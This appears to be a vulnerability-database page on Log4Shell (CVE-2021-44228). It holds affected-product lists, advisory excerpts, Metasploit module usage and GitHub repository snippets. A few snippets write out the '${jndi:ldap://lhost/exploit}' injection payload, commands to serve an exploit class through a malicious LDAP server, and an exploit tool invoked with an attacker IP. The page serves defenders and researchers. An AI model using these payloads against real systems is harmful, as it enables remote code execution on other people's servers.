9.3
CVSSv2

CVE-2021-44228

CVSSv4: NA | CVSSv3: 10 | CVSSv2: 9.3 | VMScore: 1000 | EPSS: 0.97232 | KEV: Exploitation Reported
Published: 10/12/2021 Updated: 21/11/2024

Vulnerability Summary

Apache Log4j2 2.0-beta9 up to and including 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

apache log4j

apache log4j 2.0

siemens sppa-t3000 ses3000 firmware

siemens captial

siemens captial 2019.1

siemens comos

siemens desigo cc advanced reports 4.0

siemens desigo cc advanced reports 4.1

siemens desigo cc advanced reports 4.2

siemens desigo cc advanced reports 5.0

siemens desigo cc advanced reports 5.1

siemens desigo cc info center 5.0

siemens desigo cc info center 5.1

siemens e-car operation center

siemens energy engage 3.1

siemens energyip 8.5

siemens energyip 8.6

siemens energyip 8.7

siemens energyip 9.0

siemens energyip prepay 3.7

siemens energyip prepay 3.8

siemens gma-manager

siemens head-end system universal device integration system

siemens industrial edge management

siemens industrial edge management hub

siemens logo! soft comfort

siemens mendix

siemens mindsphere

siemens navigator

siemens nx

siemens opcenter intelligence

siemens operation scheduler

siemens sentron powermanager 4.1

siemens sentron powermanager 4.2

siemens siguard dsa 4.2

siemens siguard dsa 4.3

siemens siguard dsa 4.4

siemens sipass integrated 2.80

siemens sipass integrated 2.85

siemens siveillance command

siemens siveillance control pro

siemens siveillance identity 1.5

siemens siveillance identity 1.6

siemens siveillance vantage

siemens siveillance viewpoint

siemens solid edge cam pro

siemens solid edge harness design

siemens solid edge harness design 2020

siemens spectrum power 4

siemens spectrum power 4 4.70

siemens spectrum power 7

siemens spectrum power 7 2.30

siemens teamcenter

siemens vesys

siemens vesys 2019.1

siemens xpedition enterprise -

siemens xpedition package integrator -

intel audio development kit -

intel computer vision annotation tool -

intel data center manager

intel genomics kernel library -

intel oneapi sample browser -

intel secure device onboard -

intel sensor solution firmware development kit -

intel system debugger -

intel system studio -

debian debian linux 9.0

debian debian linux 10.0

debian debian linux 11.0

fedoraproject fedora 34

fedoraproject fedora 35

sonicwall email security

netapp active iq unified manager -

netapp cloud insights -

netapp cloud manager -

netapp cloud secure agent -

netapp oncommand insight -

netapp ontap tools -

netapp snapcenter -

cisco advanced malware protection virtual private cloud appliance

cisco automated subsea tuning

cisco broadworks

cisco business process automation

cisco cloud connect

cisco cloudcenter

cisco cloudcenter cost optimizer

cisco cloudcenter suite admin

cisco cloudcenter workload manager

cisco common services platform collector

cisco connected mobile experiences -

cisco contact center domain manager

cisco contact center management portal

cisco crosswork data gateway

cisco crosswork data gateway 3.0.0

cisco crosswork network controller

cisco crosswork network controller 3.0.0

cisco crosswork optimization engine

cisco crosswork optimization engine 3.0.0

cisco crosswork platform infrastructure

cisco crosswork platform infrastructure 4.1.0

cisco crosswork zero touch provisioning

cisco crosswork zero touch provisioning 3.0.0

cisco customer experience cloud agent

cisco cyber vision sensor management extension

cisco data center network manager

cisco data center network manager 11.3(1)

cisco dna center

cisco dna spaces connector

cisco emergency responder

cisco enterprise chat and email

cisco evolved programmable network manager

cisco finesse

cisco finesse 12.6(1)

cisco fog director -

cisco identity services engine

cisco identity services engine 2.4.0

cisco integrated management controller supervisor

cisco intersight virtual appliance

cisco iot operations dashboard -

cisco network assurance engine

cisco network services orchestrator

cisco nexus dashboard

cisco nexus insights

cisco optical network controller

cisco packaged contact center enterprise

cisco packaged contact center enterprise 11.6(1)

cisco paging server

cisco prime service catalog

cisco sd-wan vmanage

cisco smart phy

cisco ucs central

cisco ucs director

cisco unified communications manager

cisco unified communications manager 11.5(1)

cisco unified communications manager 11.5(1)su3

cisco unified communications manager im and presence service

cisco unified communications manager im and presence service 11.5(1)

cisco unified contact center enterprise

cisco unified contact center enterprise 11.6(2)

cisco unified contact center express

cisco unified customer voice portal

cisco unified customer voice portal 11.6

cisco unified customer voice portal 12.0

cisco unified customer voice portal 12.5

cisco unity connection

cisco video surveillance operations manager

cisco virtual topology system

cisco virtualized infrastructure manager

cisco virtualized voice browser

cisco wan automation engine

cisco webex meetings server

cisco webex meetings server 3.0

cisco webex meetings server 4.0

cisco workload optimization manager

cisco unified intelligence center

cisco unified sip proxy

cisco unified workforce optimization

cisco fxos 6.2.3

cisco fxos 6.3.0

cisco fxos 6.4.0

cisco fxos 6.5.0

cisco fxos 6.6.0

cisco fxos 6.7.0

cisco fxos 7.0.0

cisco fxos 7.1.0

cisco automated subsea tuning 02.01.00

cisco broadworks -

cisco cloudcenter suite 4.10(0.15)

cisco cloudcenter suite 5.3(0)

cisco cloudcenter suite 5.4(1)

cisco cloudcenter suite 5.5(0)

cisco cloudcenter suite 5.5(1)

cisco common services platform collector 002.009(000.000)

cisco common services platform collector 002.009(000.001)

cisco common services platform collector 002.009(000.002)

cisco common services platform collector 002.009(001.000)

cisco common services platform collector 002.009(001.001)

cisco common services platform collector 002.009(001.002)

cisco common services platform collector 002.010(000.000)

cisco connected analytics for network deployment 006.004.000.003

cisco connected analytics for network deployment 006.005.000.

cisco connected analytics for network deployment 006.005.000.000

cisco connected analytics for network deployment 007.000.001

cisco connected analytics for network deployment 007.001.000

cisco connected analytics for network deployment 007.002.000

cisco connected analytics for network deployment 7.3

cisco connected analytics for network deployment 007.003.000

cisco connected analytics for network deployment 007.003.001.001

cisco connected analytics for network deployment 007.003.003

cisco connected analytics for network deployment 008.000.000

cisco connected analytics for network deployment 008.000.000.000.004

cisco crosswork network automation -

cisco crosswork network automation 2.0.0

cisco crosswork network automation 3.0.0

cisco crosswork network automation 4.1.0

cisco crosswork network automation 4.1.1

cisco cx cloud agent 001.012

cisco cyber vision 4.0.2

cisco cyber vision sensor management extension 4.0.2

cisco dna center 2.2.2.8

cisco dna spaces -

cisco dna spaces connector -

cisco emergency responder 11.5

cisco emergency responder 11.5(4.65000.14)

cisco emergency responder 11.5(4.66000.14)

cisco enterprise chat and email 12.0(1)

cisco enterprise chat and email 12.5(1)

cisco enterprise chat and email 12.6(1)

cisco evolved programmable network manager 3.0

cisco evolved programmable network manager 3.1

cisco evolved programmable network manager 4.0

cisco evolved programmable network manager 4.1

cisco evolved programmable network manager 5.0

cisco evolved programmable network manager 5.1

cisco finesse 12.5(1)

cisco firepower threat defense 6.2.3

cisco firepower threat defense 6.3.0

cisco firepower threat defense 6.4.0

cisco firepower threat defense 6.5.0

cisco firepower threat defense 6.6.0

cisco firepower threat defense 6.7.0

cisco firepower threat defense 7.0.0

cisco firepower threat defense 7.1.0

cisco identity services engine 002.004(000.914)

cisco identity services engine 002.006(000.156)

cisco identity services engine 002.007(000.356)

cisco identity services engine 003.000(000.458)

cisco identity services engine 003.001(000.518)

cisco identity services engine 003.002(000.116)

cisco integrated management controller supervisor 002.003(002.000)

cisco integrated management controller supervisor 2.3.2.0

cisco intersight virtual appliance 1.0.9-343

cisco mobility services engine -

cisco network assurance engine 6.0(2.1912)

cisco network dashboard fabric controller 11.0(1)

cisco network dashboard fabric controller 11.1(1)

cisco network dashboard fabric controller 11.2(1)

cisco network dashboard fabric controller 11.3(1)

cisco network dashboard fabric controller 11.4(1)

cisco network dashboard fabric controller 11.5(1)

cisco network dashboard fabric controller 11.5(2)

cisco network dashboard fabric controller 11.5(3)

cisco network insights for data center 6.0(2.1914)

cisco network services orchestrator -

cisco optical network controller 1.1

cisco paging server 8.3(1)

cisco paging server 8.4(1)

cisco paging server 8.5(1)

cisco paging server 9.0(1)

cisco paging server 9.0(2)

cisco paging server 9.1(1)

cisco paging server 12.5(2)

cisco paging server 14.0(1)

cisco prime service catalog 12.1

cisco sd-wan vmanage 20.3

cisco sd-wan vmanage 20.4

cisco sd-wan vmanage 20.5

cisco sd-wan vmanage 20.6

cisco sd-wan vmanage 20.6.1

cisco sd-wan vmanage 20.7

cisco sd-wan vmanage 20.8

cisco smart phy 3.1.2

cisco smart phy 3.1.3

cisco smart phy 3.1.4

cisco smart phy 3.1.5

cisco smart phy 3.2.1

cisco smart phy 21.3

cisco ucs central software 2.0

cisco ucs central software 2.0(1a)

cisco ucs central software 2.0(1b)

cisco ucs central software 2.0(1c)

cisco ucs central software 2.0(1d)

cisco ucs central software 2.0(1e)

cisco ucs central software 2.0(1f)

cisco ucs central software 2.0(1g)

cisco ucs central software 2.0(1h)

cisco ucs central software 2.0(1k)

cisco ucs central software 2.0(1l)

cisco unified communications manager 11.5(1.17900.52)

cisco unified communications manager 11.5(1.18119.2)

cisco unified communications manager 11.5(1.18900.97)

cisco unified communications manager 11.5(1.21900.40)

cisco unified communications manager 11.5(1.22900.28)

cisco unified communications manager im & presence service 11.5(1)

cisco unified communications manager im & presence service 11.5(1.22900.6)

cisco unified computing system 006.008(001.000)

cisco unified contact center enterprise 12.0(1)

cisco unified contact center enterprise 12.5(1)

cisco unified contact center enterprise 12.6(1)

cisco unified contact center enterprise 12.6(2)

cisco unified contact center express 12.5(1)

cisco unified contact center express 12.6(1)

cisco unified contact center express 12.6(2)

cisco unified contact center management portal 12.6(1)

cisco unified customer voice portal 11.6(1)

cisco unified customer voice portal 12.0(1)

cisco unified customer voice portal 12.5(1)

cisco unified customer voice portal 12.6(1)

cisco unified intelligence center 12.6(1)

cisco unified intelligence center 12.6(2)

cisco unified sip proxy 010.000(000)

cisco unified sip proxy 010.000(001)

cisco unified sip proxy 010.002(000)

cisco unified sip proxy 010.002(001)

cisco unified workforce optimization 11.5(1)

cisco unity connection 11.5

cisco unity connection 11.5(1.10000.6)

cisco video surveillance manager 7.14(1.26)

cisco video surveillance manager 7.14(2.26)

cisco video surveillance manager 7.14(3.025)

cisco video surveillance manager 7.14(4.018)

cisco virtual topology system 2.6.6

cisco wan automation engine 7.1.3

cisco wan automation engine 7.2.1

cisco wan automation engine 7.2.2

cisco wan automation engine 7.2.3

cisco wan automation engine 7.3

cisco wan automation engine 7.4

cisco wan automation engine 7.5

cisco wan automation engine 7.6

snowsoftware snow commander

snowsoftware vm access proxy

bentley synchro

bentley synchro 4d

percussion rhythmyx

apple xcode

Vendor Advisories

Synopsis Critical: Red Hat Process Automation Manager 7120 security update Type/Severity Security Advisory: Critical Topic An update is now available for Red Hat Process Automation ManagerRed Hat Product Security has rated this update as having a security impact of Moderate A Common Vulnerability Scoring System (CVSS) base score, which gi ...
Debian Bug report logs - #1001729 apache-log4j2: CVE-2021-45046: Incomplete fix for CVE-2021-44228 in certain non-default configurations Package: src:apache-log4j2; Maintainer for src:apache-log4j2 is Debian Java Maintainers <pkg-java-maintainers@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianor ...
Debian Bug report logs - #1001478 apache-log4j2: CVE-2021-44228: Remote code injection via crafted log messages Package: src:apache-log4j2; Maintainer for src:apache-log4j2 is Debian Java Maintainers <pkg-java-maintainers@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Fri, 10 Dec ...
It was found that the fix to address CVE-2021-44228 in Apache Log4j, a Logging Framework for Java, was incomplete in certain non-default configurations This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:l ...
Chen Zhaojun of Alibaba Cloud Security Team discovered a critical security vulnerability in Apache Log4j, a popular Logging Framework for Java JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints An attacker who can control log messages or log message pa ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046 However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM This update modifies Amazon L ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046 However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM This update modifies Amazon L ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046 However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM This update modifies Amazon L ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046 However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM This update modifies Amazon L ...
Amazon Kinesis Agent versions within Amazon Linux 2 (AL2) prior to aws-kinesis-agent-204-1 included a version of Apache Log4j affected by CVE-2021-44228 and CVE-2021-45046 The Amazon Kinesis Agent has been updated to aws-kinesis-agent-204-1 within Amazon Linux 2 that mitigates CVE-2021-44228 and CVE-2021-45046 For additional detail see https: ...
A flaw was found in the Java logging library Apache Log4j 2 in versions from 200 and before and including 2141 which could allow a remote attacker to execute code on the server if the system logs an attacker controlled string value with the attacker's JNDI LDAP server lookup The highest threat from the vulnerability is to data confidentiality ...
Critical Vulnerabilities in Apache Log4j Java Logging Library On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2150 was disclosed: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoin ...
Apache Log4j2 <=2141 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled From log4j 2 ...
ALAS-2022-225 Amazon Linux 2022 Security Advisory: ALAS-2022-225 Advisory Release Date: 2022-12-06 16:42 Pacific ...
A flaw was found in the Java logging library Apache Log4j 2 in versions from 20-beta9 and before and including 2141 This could allow a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup (CVE-2021-44228) ...
A vulnerability (CVE-2021-44228) exists in Hitachi Storage Plug-in for VMware vCenter Affected products and versions are listed below Please upgrade your version to the appropriate version, or apply the Workarounds ...
A vulnerability exists in JP1/VERITAS Affected products and versions are listed below Please upgrade your version to the appropriate version ...
A vulnerability (CVE-2021-44228) exists in Hitachi Device Manager, Hitachi Infrastructure Analytics Advisor, Hitachi Automation Director, Hitachi Ops Center Analyzer, Hitachi Ops Center Automator and Hitachi Ops Center Administrator Affected products and versions are listed below Please upgrade your version to the appropriate version, or apply ...
Citrix is aware of four vulnerabilities affecting Apache Log4j2, three of which may allow an attacker to execute arbitrary code These three vulnerabilities have been given the following identifiers:  ...
Sign up for Security Advisories Stay up to date on the latest VMware Security advisories and updates ...

ICS Advisories

Exploits

VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object This results in OS command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on Windows This Metasploit ...
This Metasploit module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload The Automatic target delivers a Java payload using remote class loading This requires Metasploit to run an HTTP server in addition to the LDAP server that the ta ...
MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server will cause it to connect to the attacker and deserialize a malicious Java object This results in OS command execution in the context of the tomcat user This Metasploit module will start an LDAP server that the target will need to connect to ...
The latest version (51) and all prior versions of Intel's Data Center Manager are vulnerable to a local privileges escalation vulnerability using the application user "dcm" used to run the web application and the rest interface An attacker who gained remote code execution using this dcm user (ie, through Log4j) is then able to escalate their pr ...
Apache Log4j2 versions 2141 and below information disclosure exploit ...
Apache Log4j2 versions 20-beta-9 and 2141 remote code execution exploit ...
Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will ...
Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that ...

Mailing Lists

Hello, To emphasize again: this needs write access to the Log4j configuration Moritz ...
Severity: moderate (CVSS: 37 AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) Description: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2150 was incomplete in certain non-default configurations This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Patte ...
Severity: critical Description: Apache Log4j2 <=2141 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup s ...
Description: JMSAppender in Log4j 12 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashi ...
Hi Ron, Is there any information on the non-default configuration that triggers the DoS? What I am trying to understand is, if we clear the first CVE through, say, envar LOG4J_FORMAT_MSG_NO_LOOKUPS=true or -Dlog4j2formatMsgNoLookups=true, then where does the vulnerability lie for the second CVE? What configuration change needs to be done to re ...

Metasploit Modules

Log4Shell HTTP Scanner

Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include HTTP headers and the HTTP request path. Known impacted software includes Apache Struts 2, VMWare VCenter, Apache James, Apache Solr, Apache Druid, Apache JSPWiki, Apache OFBiz.

msf > use auxiliary/scanner/http/log4shell_scanner
msf auxiliary(log4shell_scanner) > show actions
    ...actions...
msf auxiliary(log4shell_scanner) > set ACTION < action-name >
msf auxiliary(log4shell_scanner) > show options
    ...show and set options...
msf auxiliary(log4shell_scanner) > run
Log4Shell HTTP Header Injection

Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload. The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server that the target can connect to. The targeted application must have the trusted code base option enabled for this technique to work. The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.

msf > use exploit/multi/http/log4shell_header_injection
msf exploit(log4shell_header_injection) > show targets
    ...targets...
msf exploit(log4shell_header_injection) > set TARGET < target-id >
msf exploit(log4shell_header_injection) > show options
    ...show and set options...
msf exploit(log4shell_header_injection) > exploit

Github Repositories

Python script to map alert signatures to MITRE ATT&CK techniques.

MITRE ATT&amp;CK Mapper This project provides a Python script to map alert signatures to MITRE ATT&amp;CK techniques It uses the mitreattack-python library to fetch detailed information about MITRE ATT&amp;CK techniques dynamically from the latest STIX data Table of Contents MITRE ATT&amp;CK Mapper Table of Contents Features Prerequisites Installation Usage

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it Proof-of-concept (POC) As a

Docker Log4J

log4j-shell-poc A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it Proof-of-concept (POC) As a

Edwin's stars.

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ANTLR ASL Ada Assembly AutoHotkey Awk Ballerina Batchfile Bicep Blade Brainfuck C C# C++ CMake CSS CUE Clojure CodeQL CoffeeScript Common Lisp Coq Crystal Cuda Cython D Dart Dhall Dockerfile Elixir Emacs Lisp Erlang F# F* Fennel Forth Fortran Frege GDScript Gherkin Go Groovy HCL HTML Haml Handle

Curated list of GitHub projects I starred over the years

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents API Blueprint ActionScript ApacheConf Astro C C# C++ CSS Clojure CoffeeScript Crystal DIGITAL Command Language Dart Dockerfile Elixir Elm Erlang FreeMarker Go HTML Handlebars Haskell Java JavaScript Jupyter Notebook Kotlin Less LiveScript Lua MATLAB MDX Makefile Markdown Mustache Nunjucks OCaml

log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts Features Support for lists of URLs Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools) Fuzzing for HTTP POST Data parameters Fuzzing for JSON data parameters Supports DNS callback for vulnerability discovery and validation WAF Bypass

Details : CVE-2021-44228

JNDI-Exploit-12-log4shell Details : CVE-2021-44228 Usage : ----------------------------------------------------- java -jar JNDIExploit-12jar -i AttackerIP * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false) -h, --help Show this help --

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 2141 (through spring-boot-starter-log4j2 261) and the JDK 180_181 Running the application Run it: docker run --name vulnerable-app -p 8080:8080 ghcrio/christophetd/log4shell-vulnerable-app

WU Gloo Mesh POC Runbook Table of Contents Gloo Mesh Labs Introduction to Gloo Mesh Lab 0 - Prerequisites Lab 1 - Setting up your Environment Variables Lab 2 - Deploy Istio Lab 3 - Deploy the Bookinfo demo app Lab 4 - Deploy the httpbin demo app Lab 5 - Deploy and register Gloo Mesh Lab 6 - Create the gateways workspace Lab 7 - Create the bookinfo workspace Lab 8a - Expose the

CVE-2021-44228 こっちのお話の方がより実用性があると思います(泣)christophetd/log4shell-vulnerable-app 興味を持って勢いで調べただけなので、あやふやな箇所や間違いがあると思われます。 どうか、自己責任でお願いします。 再現環境を作る。 linux環境であれば動作すると思われます。 1 jd

Detect and fix log4j log4shell vulnerability (CVE-2021-44228)

log4fix This tool is to detect and fix the log4j log4shell vulnerability (CVE-2021-44228) by looking and removing the JndiLookup class from jar/war/ear files with zero dependencies for free This tool has been tested on: - Linux 32bit and 64 bit - Windows 32 bit and 64 bit - OpenBSD 64 bit This tool is written in the Go programming language which means zero dependencies and

Log4j Scans githubcom/fullhunt/log4j-scan log4shellhuntresscom/ wwwcyberdraincom/monitoring-with-powershell-detecting-log4j-files/ researchnccgroupcom/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/ githubcom/hillu/local-log4j-vuln-scanner githubcom/omrsafetyo/PowerShellSnippets/blob/master/In

log4j2-rce靶场

springboot-login-log4j2 项目介绍 在laoyogd的springboot-login项目的基础上引入了log4j2生成日志,作为复现CVE-2021-44228的靶场。 docker一键部署 githubcom/Ode1esse/springboot-login-log4j2-docker 本地调试 创建login数据库 create database login default character set utf8mb4 collate utf8mb4_general_ci; 导入initsql 运行项目之后

A community sourced list of log4j-affected software

CISA Log4j (CVE-2021-44228) Vulnerability Guidance This repository provides CISA's guidance and an overview of related software regarding the Log4j vulnerability (CVE-2021-44228) CISA urges users and administrators to upgrade to Log4j 2171 (Java 8), 2124 (Java 7) and 232 (Java 6), and review and monitor the Apache Log4j Security Vulnerabilities webpage for updates a

Quick Deploy to show case cve-2021-44228

Cloud One - Workload Security Log4Shell This repo contains a quick deployment template to showcase CVE-2021-44228 LOG4SHELL exploit and Workload Security Intrusion Prevention Note on CFT deployment in AWS regions I only added AMI Id's for US-EAST-1, US-EAST-2, US-WEST-1, US-WEST-2, CA-CENTRAL-1, SA-EAST-1, EU-WEST-1 Deploy CloudFormation Template Parameters to Define:

Fun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers.

anti-jndi Fun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers Based on the post by @shipilev (gistgithubcom/shipilev/92e709a868f3d328b6636e1bfc21cf09) I ported his example to Apache2 A coworker did it for Lighttpd I decided to make our examples public for convenience Idea There are only few reasons to put th

Log4Shell dockerized full chain

Full-chain dockerized Log4Shell (CVE-2021-44228) Log4Shell (CVE-2021-44228) is a critical vulnerability in the popular log4j2 logging package This vulnerability is extremely easy to exploit, and was fixed in log4j2 version 215 This repository goal is to automate and construct the environment through a single click by using docker-compose and containers This could be useful

Zusammenspiel von SpringBoot und Logback und Log4j2 Dies ist ein kleines Beispielprojekt, welches das Zusammenspiel von SpringBoot und LogBack untersucht Keine Ahnung, warum wir Logback verwenden und nicht das neuere Log4j2! Im Rahmen von CVE-2021-44228 vulnerability in Apache Log4j library erweitere ich die Untersuchung noch ein klein wenig in Hinblick auf die Einbindung von

Code Insight v7 Inventory Keyword Search Script

Code Insight v7 Inventory Keyword Search Script This python script allows users to query their Code Insight v7 system and obtain a list of all projects potentially impacted by the Log4j security vulnerability (CVE-2021-44228) along with a listing of all potentially impacted inventory items using a multi keyword search Prerequisites The following prerequisites are requried to r

This repository contains all gathered resources we used during our Incident Reponse on CVE-2021-44228 and CVE-2021-45046 aka Log4Shell.

CVE-2021-44228: Log4j / Log4Shell Security Research Summary This repository contains all gathered resources we used during our Incident Reponse on CVE-2021-44228 and CVE-2021-45046 aka Log4Shell Threat Intel Mitigations / Fixes Malware Reports Advisory IOCs / Callback Domains / IP Addresses Honeypots Payloads / Obfuscation / WAF Bypass Vulnerability Scanning Exploitation

Log4j Scanner This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 &amp; CVE-2021-45046) The information and code in this repository is provided "as is" and was assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community This is

Log4j for nuclei

Log4jNuclei CVE-2021-44228 Log4j for nuclei Exploit javac Exploitjava python3 -m httpserver 80 java -cp marshalsec-003-SNAPSHOT-alljar marshalsecjndiLDAPRefServer 127001/#Exploit insert log ${jndi:ldap://lhost/exploit} /////// java -jar exploit/JNDI-Injection-Exploit-10-SNAPSHOT-alljar -C 'here_command' -A 0000

Log4j2 fix

Mule patcher A simple script that patches Mule anypoint studio, but it can be adapted for other projects as well Mule seems to work after the patch though deep dives need to be done for each application Note that the scala log4j drivers have not been patched yet Legal This is a quick and dirty tool, free to use and comes with NO WARRANTY at all Use at your own risk! Usage S

Bash and PowerShell scripts to scan a local filesystem for Log4j .jar files which could be vulnerable to CVE-2021-44228 aka Log4Shell.

Log4j-Checker This repository contains scripts that can help identity jar files which may be vulnerable to CVE-2021-44228 aka Log4Shell Log4Shell Hash Check This script will find jar files within the filesystem starting from a specific path, calculate a SHA-256 hash for each jar file found - regardless of the filename - and compare this value against a user-provided list of

CVE-2021-44228-VULN-APP NOTE: This is a vulnerable virtual machine for showing what actually is this vulnerability log4j, and so on! Installation: cd CVE-2021-44228-VULN-APP/ docker build -t log4j-shell-poc docker run --network host log4j-shell-poc Listening on port 8080

Go module to generate and transform VEX documents

go-vex Go library for generating, consuming, and operating on VEX documents This repository contains the OpenVEX Go source code This module lets authors create, modify and manage VEX documents The full documentation for this module can be found at pkggodev/githubcom/openvex/go-vex For more information about the OpenVEX specification implemented by this module,

Tools for remediating the recent log4j2 RCE vulnerability (CVE-2021-44228)

log4j-remediation-tools Tools for finding and reproducing the CVE-2021-44228 log4j2 vulnerability Tools find-vulnerabilities: determine heuristically whether a running JVM is vulnerable confirm-vulnerabilities: determine with 100% accuracy whether a running JVM is vulnerable Usage Both of these tools scan all running JVM processes on a machine, and produce a CSV report abou

永恒之恶龙-Log4j漏洞安全自查工具

ELong-永恒之恶龙 2021年12月9日晚上,Log4j的漏洞详情被公开了。至此,一个神洞出现了。我们给这个漏洞起了一个名字:永恒之恶龙!可以利用该工具更好的自测是否受该漏洞的影响,或是在授权的情况下可以利用该工具更好的进行漏洞探测或漏洞利用。作者将持续关注并逐步公布此漏洞

LOG4J CVE-2021-44228 IOC IOC list of newly discovered zero-day vulnerability in widely used Java log library Apache Log4j IP Adress 2312964131 1679413858 2312964141 16214212544 2312964146 16214212543 2312964148 1679413842 8711811027 1042447455 18522010162 1851077056 1097010031 185220101187 185220101132 16214212542 4512134108

POC for CVE-2021-44228 within Springboot

log4j Spring vulnerable POC This is a POC for a simple spring boot start backend with maven including vulnerable log4j version for CVE-2021-44228 Spring boot bootstrapped with startspringio commands /mvnw spring-boot:run: start server /mvnw dependency:tree: print dependency tree and check for log4j version in use nc -k -l 3030: bash, start server socket to listen

log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts Features Support for lists of URLs Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools) Fuzzing for HTTP POST Data parameters Fuzzing for JSON data parameters Supports DNS callback for vulnerability discovery and validation WAF Bypass

My Github Stars

